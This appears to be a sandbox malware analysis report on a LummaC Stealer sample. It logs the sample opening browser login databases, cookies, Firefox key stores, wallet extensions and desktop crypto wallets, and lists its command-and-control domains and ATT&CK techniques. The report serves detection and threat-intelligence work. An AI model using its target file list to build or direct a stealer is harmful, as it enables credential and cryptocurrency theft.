Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2259071375.0000000001006000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2212521763.0000000001005000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2259012497.0000000001006000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2190452514.0000000001001000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2235678317.0000000001005000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2212421747.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2212500277.0000000001002000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2261414653.0000000001009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5632, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 5632, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	1 OS Credential Dumping	761 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	34 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	5 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.XPACK.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://atten-supporse.biz/B	100%	Avira URL Cloud	malware
https://atten-supporse.biz/apiF	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api66	100%	Avira URL Cloud	malware
https://atten-supporse.biz/v8	100%	Avira URL Cloud	malware
https://atten-supporse.biz/api)	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
atten-supporse.biz	104.21.112.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
dare-curbys.biz	false	high
impend-differ.biz	false	high
covery-mover.biz	false	high
https://atten-supporse.biz/api	false	high
dwell-exclaim.biz	false	high
zinc-sneark.biz	false	high
formy-spill.biz	false	high
atten-supporse.biz	false	high
se-blurry.biz	false	high
print-vexer.biz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://atten-supporse.biz/apiF	file.exe, 00000000.00000002.2344169345.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/B	file.exe, 00000000.00000002.2344104986.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/apiC	file.exe, 00000000.00000002.2344169345.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000003.2238173854.00000000058F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238173854.00000000058F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000003.2238173854.00000000058F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2237695245.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2190380035.000000000591F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2190484174.0000000005908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/v8	file.exe, 00000000.00000002.2344169345.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F91000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2259200787.00000000058F8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2236628228.0000000005936000.00000004.00000800.00020000.00000000.sdmp	false		high
